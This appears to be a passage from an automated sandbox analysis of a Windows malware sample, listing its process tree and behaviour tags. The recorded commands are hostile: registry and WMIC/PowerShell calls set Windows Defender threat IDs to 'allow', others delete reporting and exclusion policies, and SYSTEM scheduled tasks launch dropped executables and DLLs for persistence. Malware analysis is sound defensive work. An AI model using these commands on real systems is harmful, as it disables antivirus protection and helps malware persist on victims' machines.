  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9792
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9752
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9416
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      Drops file in Program Files directory
      PID:2196
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5356
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9488
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:8000
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:5016
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 14:13:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\LuJlMYz.exe\" lA /site_id 668658 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:10200
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "YqJChhYnTMHzkMjCc"
    3⤵
    PID:3432
- C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\QUcFAJV.exe
  C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\QUcFAJV.exe lA /site_id 394347 /S
  2⤵
  - Checks computer location settings
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:7572
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:5712
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:8700
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5728
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Modifies data under HKEY_USERS
        
        PID:8208
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:9692
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:7864
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4504
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:9844
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:5480
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:9200
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        Blocklisted process makes network request
        Drops file in Drivers directory
        
        PID:3432
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:8872
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:8480
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:4280
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:6464
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7936
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:6588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:4836
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:9932
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:7836
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:8364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\UlGVkK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:9764
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\bacSwXo.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:9664
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "RulYNORIEfYpYdh"
    3⤵
    PID:10184
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "RulYNORIEfYpYdh"
    3⤵
    PID:8752
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\hbqkdmM.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:9752
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\FYhaJzQ.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3076
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Loads dropped DLL
      PID:9128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\rwjuZze.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:10224
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\kQZAiAo.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:5740
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "TzpzstmaipgnuWYOU" /SC once /ST 11:08:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mlmrxyCihFugMjhe\Wezyyhxr\tlmJwxo.dll\",#1 /site_id 394347" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:3152
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "TzpzstmaipgnuWYOU"
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "spuyBEwyIisc" /SC once /ST 02:44:24 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\XBsvxPcw\BQGoqtZ.exe\" vm /S"
    3⤵
    - Creates scheduled task(s)
    PID:9748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "spuyBEwyIisc"
    3⤵
    PID:9848
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8688
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "spuyBEwyIisc"
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "spuyBEwyIisc"
    3⤵
    PID:7492
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "mgkXT1" /SC once /ST 16:28:04 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
    3⤵
    - Creates scheduled task(s)
    PID:8128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "mgkXT1"
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "mgkXT1"
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:5612
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      4⤵
      PID:8480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:9532
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      4⤵
      PID:9348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "YqJChhYnTMHzkMjCc"
    3⤵
    PID:7372
- C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\LuJlMYz.exe
  C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\LuJlMYz.exe lA /site_id 668658 /S
  2⤵
  - Checks computer location settings
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:9380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:6580
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:8396
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:3584
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:8804
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:10092
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:8040
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:6532
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Modifies data under HKEY_USERS
        
        PID:10120
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:10088
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:4552
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5912
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4904
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:6436
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:4936
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:8352
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:9644
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:8480
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"
    3⤵
    PID:9944
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:8280
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      Drops file in Windows directory
      PID:10200
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:9808
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:8364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\QdLVAZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:7336
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\vvYgNkR.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:9892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "RulYNORIEfYpYdh"
    3⤵
    PID:8604
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "RulYNORIEfYpYdh"
    3⤵
    PID:8224
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Drops file in Windows directory
      PID:7336
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\BBAvLwB.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:5860
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\RWfgkbe.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:5912
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\qGrfEGr.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:6240
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\PVLACjG.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:5136
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "spuvuDPFHOyn" /SC once /ST 04:23:43 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ngpfbsEa\FiuyNOb.exe\" vm /S"
    3⤵
    - Creates scheduled task(s)
    PID:10080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "spuvuDPFHOyn"
    3⤵
    PID:6792
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "spuvuDPFHOyn"
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "spuvuDPFHOyn"
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:2068
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      4⤵
      PID:3936
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      4⤵
      PID:3680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "YqJChhYnTMHzkMjCc"
    3⤵
    PID:4788
- \??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\Wezyyhxr\tlmJwxo.dll",#1 /site_id 394347
  2⤵
  PID:8744
- - C:\Windows\SysWOW64\rundll32.exe
    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\Wezyyhxr\tlmJwxo.dll",#1 /site_id 394347
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    PID:9488
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "TzpzstmaipgnuWYOU"
      4⤵
      PID:6776
- C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\XBsvxPcw\BQGoqtZ.exe
  C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\XBsvxPcw\BQGoqtZ.exe vm /S
  2⤵
  - Modifies Internet Explorer settings
  PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH 